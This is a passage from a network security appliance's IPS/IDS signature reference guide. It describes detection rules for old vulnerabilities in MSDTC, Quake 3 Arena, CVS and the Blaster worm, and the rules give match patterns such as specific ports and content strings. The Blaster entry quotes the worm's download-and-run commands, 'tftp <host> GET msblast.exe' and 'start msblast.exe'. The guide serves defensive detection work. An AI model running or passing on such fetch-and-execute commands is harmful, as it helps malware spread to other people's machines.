TMS zl Module IPS/IDS Signature Reference Guide RLX.10.2.2.94

ManualsBrandsHP ManualsComputer AccessoriesHP ProCurve Switch xl Access Controller Module

411

412

413

414

415

416

417

418

419

420

ProCurve TMS zl Module IPS/IDS Signature

Reference Guide Version RLX.10.2.2.94

416

with Microsoft SQL Server 6.5 and higher. There exists a vulnerability, which can be exploited by a remote attacker by

sending 200 NULL bytes. This results in crashing the MSDTC service.

Signature ID: 10185

Quake 3 Arena Possible Buffer Overflow Vulnerability

Threat Level: Critical

Industry ID: CVE-2001-1289

Bugtraq: 3123 Nessus: 10931

Signature Description: Quake3 Arena Server is a software package designed to host multiple Quake 3 players over a

network for interactive play. A vulnerability exists in this software that can allow a malicious user to remotely crash a

Quake 3 Server by sending a specially crafted login string and execute arbitrary code.

Signature ID: 10186

CVS Entry Line Flag Remote Heap Overflow

Threat Level: Information

Industry ID: CVE-2004-0396 Bugtraq: 10384 Nessus: 13701,13706,12495,14147,14498

Signature Description: The Concurrent Versions System (CVS) server is a source control system allowing developers

that share, control and track changes in a central source repository.CVS versions 1.1.15 and below contain an error in

the handling of flags during entry line insertion. This error allows heap data to be overflown. An attacker could exploit

this vulnerability to execute arbitrary code in the context of the CVS process, which is usually root. At a minimum heap

corruption will result in a segmentation fault, causing a denial of service. This rule hits when the attack pattern towards

2401 Destination port, "Entry" content present and "set" content present within 50 bytes.

Signature ID: 10187

CVS Entry Line Flag Remote Heap Overflow

Threat Level: Information

Industry ID: CVE-2004-0396 Bugtraq: 10384 Nessus: 13701,13706,12495,14147,14498

Signature Description: The Concurrent Versions System (CVS) server is a source control system allowing developers

that share, control and track changes in a central source repository.CVS versions 1.1.15 and below contain an error in

the handling of flags during entry line insertion. This error allows heap data to be overflown. An attacker could exploit

this vulnerability to execute arbitrary code in the context of the CVS process, which is usually root. At a minimum heap

corruption will result in a segmentation fault, causing a denial of service. This rule hits when an attacker sending long

string on TCP port 2401.

Signature ID: 10188

Blaster Worm Command Shell Attack

Threat Level: Information

Industry ID: CVE-2003-0352 Bugtraq: 8205 Nessus: 11808

Signature Description: The Blaster worm propagates via the Microsoft Windows DCOM RPC Interface Buffer

Overrun Vulnerability. The worm opens a command shell on victim host on TCP port 4444. It issues the commands

"tftp <host> GET msblast.exe" and "start msblast.exe" over thecommand shell. The command shell is closed once the

attacking host disconnects.<br><br>A Windows Distributed Component Object Model (DCOM) Remote Procedure

Call (RPC) interface in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 is vulnerable to a buffer overflow

condition. Successful exploitation of the vulnerability could allow execution of arbitrary code using SYSTEM

privileges.

Signature ID: 10189

Blaster Worm Command Shell Attack

Threat Level: Information

Industry ID: CVE-2003-0352 Bugtraq: 8205 Nessus: 11808